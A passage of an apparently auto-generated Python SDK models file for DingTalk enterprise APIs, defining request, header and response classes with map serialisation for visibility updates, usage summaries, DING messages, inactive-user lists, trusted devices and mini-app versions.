if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('deptIds') is not None:
self.dept_ids = m.get('deptIds')
if m.get('userIds') is not None:
self.user_ids = m.get('userIds')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class UpdateRoleVisibilityResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: bool = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
self.body = m.get('body')
return self
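# Note (descriptive, per the generated code above): unlike most responses in
# this module, UpdateRoleVisibilityResponse carries a plain bool body, so
# from_map() assigns it directly instead of hydrating a nested TeaModel.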
class GetGeneralFormCreatedSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetGeneralFormCreatedSummaryResponseBody(TeaModel):
def __init__(
self,
general_form_created_cnt: str = None,
):
# Cumulative number of Smart Forms created in the last day
self.general_form_created_cnt = general_form_created_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.general_form_created_cnt is not None:
result['generalFormCreatedCnt'] = self.general_form_created_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('generalFormCreatedCnt') is not None:
self.general_form_created_cnt = m.get('generalFormCreatedCnt')
return self
class GetGeneralFormCreatedSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetGeneralFormCreatedSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetGeneralFormCreatedSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetDocCreatedSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetDocCreatedSummaryResponseBody(TeaModel):
def __init__(
self,
doc_created_cnt: str = None,
):
        # Cumulative number of documents created in the last 1 day
self.doc_created_cnt = doc_created_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.doc_created_cnt is not None:
result['docCreatedCnt'] = self.doc_created_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('docCreatedCnt') is not None:
self.doc_created_cnt = m.get('docCreatedCnt')
return self
class GetDocCreatedSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetDocCreatedSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetDocCreatedSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SendAppDingHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SendAppDingRequest(TeaModel):
def __init__(
self,
userids: List[str] = None,
content: str = None,
):
        # List of users to receive the DING message
        self.userids = userids
        # Message content
        self.content = content
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.userids is not None:
result['userids'] = self.userids
if self.content is not None:
result['content'] = self.content
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userids') is not None:
self.userids = m.get('userids')
if m.get('content') is not None:
self.content = m.get('content')
return self
class SendAppDingResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
self.validate_required(self.headers, 'headers')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class UpdatePartnerVisibilityHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class UpdatePartnerVisibilityRequest(TeaModel):
def __init__(
self,
label_id: int = None,
dept_ids: List[int] = None,
user_ids: List[str] = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
ding_org_id: int = None,
ding_isv_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
):
        # Label ID
        self.label_id = label_id
        # IDs of departments with visibility
        self.dept_ids = dept_ids
        # IDs of users with visibility
        self.user_ids = user_ids
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
self.ding_org_id = ding_org_id
self.ding_isv_org_id = ding_isv_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.dept_ids is not None:
result['deptIds'] = self.dept_ids
if self.user_ids is not None:
result['userIds'] = self.user_ids
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('deptIds') is not None:
self.dept_ids = m.get('deptIds')
if m.get('userIds') is not None:
self.user_ids = m.get('userIds')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class UpdatePartnerVisibilityResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: bool = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
self.body = m.get('body')
return self
class GetDingReportDeptSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetDingReportDeptSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
        # Starting data cursor
        self.next_token = next_token
        # Number of records per page
        self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetDingReportDeptSummaryResponseBodyData(TeaModel):
def __init__(
self,
dept_id: str = None,
dept_name: str = None,
ding_report_send_usr_cnt: str = None,
ding_report_send_cnt: str = None,
):
        # Department ID
        self.dept_id = dept_id
        # Department name
        self.dept_name = dept_name
        # Number of users who created reports in the last 1 day
        self.ding_report_send_usr_cnt = ding_report_send_usr_cnt
        # Number of reports created in the last 1 day
        self.ding_report_send_cnt = ding_report_send_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.dept_name is not None:
result['deptName'] = self.dept_name
if self.ding_report_send_usr_cnt is not None:
result['dingReportSendUsrCnt'] = self.ding_report_send_usr_cnt
if self.ding_report_send_cnt is not None:
result['dingReportSendCnt'] = self.ding_report_send_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('deptName') is not None:
self.dept_name = m.get('deptName')
if m.get('dingReportSendUsrCnt') is not None:
self.ding_report_send_usr_cnt = m.get('dingReportSendUsrCnt')
if m.get('dingReportSendCnt') is not None:
self.ding_report_send_cnt = m.get('dingReportSendCnt')
return self
class GetDingReportDeptSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetDingReportDeptSummaryResponseBodyData] = None,
next_token: int = None,
has_more: bool = None,
):
        # Report statistics broken down by department
        self.data = data
        # Pagination cursor for the next request
        self.next_token = next_token
        # Whether more data is available
        self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetDingReportDeptSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetDingReportDeptSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetDingReportDeptSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetDingReportDeptSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
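# Added illustration: a minimal sketch of how the nextToken/hasMore fields above
# are meant to drive pagination. `fetch_page` is a hypothetical callable that
# performs the actual HTTP request and returns a GetDingReportDeptSummaryResponseBody;
# it is not part of this models file, and starting the cursor at 0 is an assumption.
def iter_ding_report_dept_summaries(fetch_page, page_size: int = 100):
    """Yield every department summary row across all pages."""
    next_token = 0
    while True:
        request = GetDingReportDeptSummaryRequest(next_token=next_token, max_results=page_size)
        body = fetch_page(request)
        for item in body.data or []:
            yield item
        if not body.has_more:
            break
        next_token = body.next_token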
class GetInActiveUserListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetInActiveUserListRequest(TeaModel):
def __init__(
self,
stat_date: str = None,
service_id: int = None,
ding_oauth_app_id: int = None,
ding_org_id: int = None,
page_number: int = None,
page_size: int = None,
dept_ids: List[str] = None,
):
self.stat_date = stat_date
self.service_id = service_id
self.ding_oauth_app_id = ding_oauth_app_id
self.ding_org_id = ding_org_id
self.page_number = page_number
self.page_size = page_size
self.dept_ids = dept_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.stat_date is not None:
result['statDate'] = self.stat_date
if self.service_id is not None:
result['serviceId'] = self.service_id
if self.ding_oauth_app_id is not None:
result['dingOauthAppId'] = self.ding_oauth_app_id
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.dept_ids is not None:
result['deptIds'] = self.dept_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('statDate') is not None:
self.stat_date = m.get('statDate')
if m.get('serviceId') is not None:
self.service_id = m.get('serviceId')
if m.get('dingOauthAppId') is not None:
self.ding_oauth_app_id = m.get('dingOauthAppId')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('deptIds') is not None:
self.dept_ids = m.get('deptIds')
return self
class GetInActiveUserListResponseBodyMetaList(TeaModel):
def __init__(
self,
kpi_id: str = None,
kpi_name: str = None,
unit: str = None,
kpi_caliber: str = None,
period: str = None,
):
        # KPI ID
        self.kpi_id = kpi_id
        # KPI name
        self.kpi_name = kpi_name
        # KPI unit
        self.unit = unit
        # KPI definition (measurement caliber)
        self.kpi_caliber = kpi_caliber
        # KPI period
        self.period = period
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.kpi_id is not None:
result['kpiId'] = self.kpi_id
if self.kpi_name is not None:
result['kpiName'] = self.kpi_name
if self.unit is not None:
result['unit'] = self.unit
if self.kpi_caliber is not None:
result['kpiCaliber'] = self.kpi_caliber
if self.period is not None:
result['period'] = self.period
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('kpiId') is not None:
self.kpi_id = m.get('kpiId')
if m.get('kpiName') is not None:
self.kpi_name = m.get('kpiName')
if m.get('unit') is not None:
self.unit = m.get('unit')
if m.get('kpiCaliber') is not None:
self.kpi_caliber = m.get('kpiCaliber')
if m.get('period') is not None:
self.period = m.get('period')
return self
class GetInActiveUserListResponseBody(TeaModel):
def __init__(
self,
data_list: List[Dict[str, Any]] = None,
meta_list: List[GetInActiveUserListResponseBodyMetaList] = None,
):
        # KPI data
        self.data_list = data_list
        # KPI metadata
        self.meta_list = meta_list
def validate(self):
if self.meta_list:
for k in self.meta_list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.data_list is not None:
result['dataList'] = self.data_list
result['metaList'] = []
if self.meta_list is not None:
for k in self.meta_list:
result['metaList'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dataList') is not None:
self.data_list = m.get('dataList')
self.meta_list = []
if m.get('metaList') is not None:
for k in m.get('metaList'):
temp_model = GetInActiveUserListResponseBodyMetaList()
self.meta_list.append(temp_model.from_map(k))
return self
class GetInActiveUserListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetInActiveUserListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetInActiveUserListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
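# Added illustration: pairing dataList rows with their metaList metadata. This
# is a hedged sketch only; it assumes each dataList row is a dict keyed by
# kpiId, which is an assumption about the payload shape rather than something
# this models file guarantees.
def describe_inactive_user_kpis(body: GetInActiveUserListResponseBody):
    """Print each KPI value together with its metadata, when rows are keyed by kpiId."""
    meta_by_id = {meta.kpi_id: meta for meta in (body.meta_list or [])}
    for row in body.data_list or []:
        for kpi_id, value in row.items():
            meta = meta_by_id.get(kpi_id)  # assumption: row keys are kpiId values
            label = meta.kpi_name if meta else kpi_id
            unit = (meta.unit or '') if meta else ''
            print(f'{label}: {value}{unit}')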
class GetTrustDeviceListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetTrustDeviceListRequest(TeaModel):
def __init__(
self,
user_ids: List[str] = None,
):
self.user_ids = user_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.user_ids is not None:
result['userIds'] = self.user_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userIds') is not None:
self.user_ids = m.get('userIds')
return self
class GetTrustDeviceListResponseBodyData(TeaModel):
def __init__(
self,
user_id: str = None,
platform: str = None,
mac_address: str = None,
status: int = None,
create_time: int = None,
):
        # User ID
        self.user_id = user_id
        # Platform type
        self.platform = platform
        # MAC address
        self.mac_address = mac_address
        # Device status
        self.status = status
        # Creation time
        self.create_time = create_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.user_id is not None:
result['userId'] = self.user_id
if self.platform is not None:
result['platform'] = self.platform
if self.mac_address is not None:
result['macAddress'] = self.mac_address
if self.status is not None:
result['status'] = self.status
if self.create_time is not None:
result['createTime'] = self.create_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('platform') is not None:
self.platform = m.get('platform')
if m.get('macAddress') is not None:
self.mac_address = m.get('macAddress')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('createTime') is not None:
self.create_time = m.get('createTime')
return self
class GetTrustDeviceListResponseBody(TeaModel):
def __init__(
self,
data: List[GetTrustDeviceListResponseBodyData] = None,
):
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetTrustDeviceListResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetTrustDeviceListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetTrustDeviceListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetTrustDeviceListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ListMiniAppAvailableVersionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ListMiniAppAvailableVersionRequest(TeaModel):
def __init__(
self,
version_type_set: List[int] = None,
page_size: int = None,
page_number: int = None,
ding_isv_org_id: int = None,
ding_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
mini_app_id: str = None,
):
        # Version types: 0 = development, 1 = gray release, 2 = published, 3 = trial
        self.version_type_set = version_type_set
        # Page size
        self.page_size = page_size
        # Page number (1-based)
        self.page_number = page_number
self.ding_isv_org_id = ding_isv_org_id
self.ding_org_id = ding_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
        # Mini app ID
self.mini_app_id = mini_app_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.version_type_set is not None:
result['versionTypeSet'] = self.version_type_set
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('versionTypeSet') is not None:
self.version_type_set = m.get('versionTypeSet')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
return self
class ListMiniAppAvailableVersionResponseBodyList(TeaModel):
def __init__(
self,
build_status: int = None,
version: str = None,
):
        # Build status: 0 = building, 1 = succeeded, 2 = failed
        self.build_status = build_status
        # Version
        self.version = version
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.build_status is not None:
result['buildStatus'] = self.build_status
if self.version is not None:
result['version'] = self.version
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('buildStatus') is not None:
self.build_status = m.get('buildStatus')
if m.get('version') is not None:
self.version = m.get('version')
return self
class ListMiniAppAvailableVersionResponseBody(TeaModel):
def __init__(
self,
list: List[ListMiniAppAvailableVersionResponseBodyList] = None,
):
# result
self.list = list
def validate(self):
if self.list:
for k in self.list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['list'] = []
if self.list is not None:
for k in self.list:
result['list'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.list = []
if m.get('list') is not None:
for k in m.get('list'):
temp_model = ListMiniAppAvailableVersionResponseBodyList()
self.list.append(temp_model.from_map(k))
return self
class ListMiniAppAvailableVersionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListMiniAppAvailableVersionResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListMiniAppAvailableVersionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SearchOrgInnerGroupInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SearchOrgInnerGroupInfoRequest(TeaModel):
def __init__(
self,
